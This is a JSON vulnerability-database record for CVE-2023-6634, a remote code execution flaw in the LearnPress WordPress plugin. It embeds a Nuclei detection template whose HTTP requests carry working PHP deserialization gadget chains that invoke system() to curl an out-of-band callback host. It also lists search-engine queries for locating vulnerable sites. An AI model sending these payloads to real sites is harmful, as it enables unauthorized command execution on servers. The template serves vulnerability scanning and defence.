{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-6634/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-6634/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-6634/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-6634/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-6634/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-6634"},"sightings":{"href":"/api/v1/sightings/cve-2023-6634"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.08544,"kev":false,"percentile":0.94863},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-6634.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2023-6634\n\ninfo:\n  name: LearnPress < 4.2.5.8 - Remote Code Execution\n  author: iamnoooob,rootxharsh,pdresearch\n  severity: critical\n  description: |\n    The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n  impact: |\n    Unauthenticated attackers can exploit command injection through the get_content function using call_user_func to execute arbitrary public functions and achieve remote code execution on WordPress installations.\n  remediation: Fixed in 4.2.5.8\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-command-injection\n    - https://wpscan.com/vulnerability/909580f4-1306-4e61-ac7d-e7a2eb0961f8/\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-6634\n    - https://plugins.trac.wordpress.org/changeset/3013957/learnpress\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/21291ed7-cdc0-4698-9ec4-8417160845ed?source=cve\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-6634\n    cwe-id: CWE-77\n    epss-score: 0.08544\n    epss-percentile: 0.94863\n    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: thimpress\n    product: learnpress\n    framework: wordpress\n    shodan-query: http.html:/wp-content/plugins/learnpress\n    fofa-query: body=/wp-content/plugins/learnpress\n    publicwww-query: \"/wp-content/plugins/learnpress\"\n  tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,learnpress,rce,intrusive,thimpress,vkev,vuln\nvariables:\n  oast: \"{{interactsh-url}}/?\"\n  padstr: \"{{randstr}}\"\n  finalurl: \"{{padding(oast,padstr,59)}}\"\n\nhttp:\n  - raw:\n      - |+\n        GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\"%3a\"LP_Debug\",\"method\"%3a\"var_dump\"}&args=\"{{randstr}}\" HTTP/1.1\n        Host: {{Hostname}}\n\n      - |+\n        GET /wp-json/lp/v1/load_content_via_ajax/?callback={%22class%22:%22LP_Helper%22,%22method%22:%22maybe_unserialize%22}&args=\"O%3a13%3a\\u0022WP_HTML_Token\\u0022%3a2%3a{s%3a13%3a\\u0022bookmark_name\\u0022%3bs%3a64%3a\\u0022curl+{{finalurl}}\\u0022%3bs%3a10%3a\\u0022on_destroy\\u0022%3bs%3a6%3a\\u0022system\\u0022%3b}\" HTTP/1.1\n        Host: {{Hostname}}\n        Connection: close\n\n      - |+\n        GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\":\"LP_Helper\",\"method\":\"maybe_unserialize\"}&args=\"O%3a8%3a\\u0022WP_Theme\\u0022%3a2%3a{s%3a7%3a\\u0022headers\\u0022%3bO%3a13%3a\\u0022WP_Block_List\\u0022%3a2%3a{s%3a6%3a\\u0022blocks\\u0022%3ba%3a1%3a{s%3a4%3a\\u0022Name\\u0022%3ba%3a1%3a{s%3a9%3a\\u0022blockName\\u0022%3bs%3a12%3a\\u0022Parent+Theme\\u0022%3b}}s%3a8%3a\\u0022registry\\u0022%3bO%3a22%3a\\u0022WP_Block_Type_Registry\\u0022%3a1%3a{s%3a22%3a\\u0022registered_block_types\\u0022%3bO%3a8%3a\\u0022WP_Theme\\u0022%3a2%3a{s%3a7%3a\\u0022headers\\u0022%3bN%3bs%3a6%3a\\u0022parent\\u0022%3bO%3a22%3a\\u0022WpOrg\\\\Requests\\\\Session\\u0022%3a3%3a{s%3a3%3a\\u0022url\\u0022%3bs%3a10%3a\\u0022http%3a//p%3a0\\u0022%3bs%3a7%3a\\u0022headers\\u0022%3ba%3a1%3a{i%3a0%3bs%3a64%3a\\u0022curl+{{finalurl}}\\u0022%3b}s%3a7%3a\\u0022options\\u0022%3ba%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3bO%3a20%3a\\u0022WpOrg\\\\Requests\\\\Hooks\\u0022%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3ba%3a1%3a{s%3a23%3a\\u0022requests.before_request\\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bO%3a20%3a\\u0022WpOrg\\\\Requests\\\\Hooks\\u0022%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3ba%3a1%3a{s%3a15%3a\\u0022http%3a//p%3a0/Name\\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3bs%3a6%3a\\u0022system\\u0022%3b}}}}i%3a1%3bs%3a8%3a\\u0022dispatch\\u0022%3b}}}}}}}}}}s%3a6%3a\\u0022parent\\u0022%3bN%3b}\" HTTP/1.1\n        Host: {{Hostname}}\n\n    stop-at-first-match: true\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains_any(interactsh_protocol, 'http', 'dns')\"\n          - \"contains(body, 'Error: data content invalid!')\"\n          - \"contains(body_1, '<pre>{{randstr}}</pre>') \"\n          - \"status_code == 200\"\n        condition: and\n# digest: 490a0046304402201e45eb94288dae9adca7dae3a016980946b2eac5c9dbc6754c5266642f680f630220473325c70470d92985710cf2668e7f3bfce5cec99cf6fde148cd4a5235292560:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2023-6634"}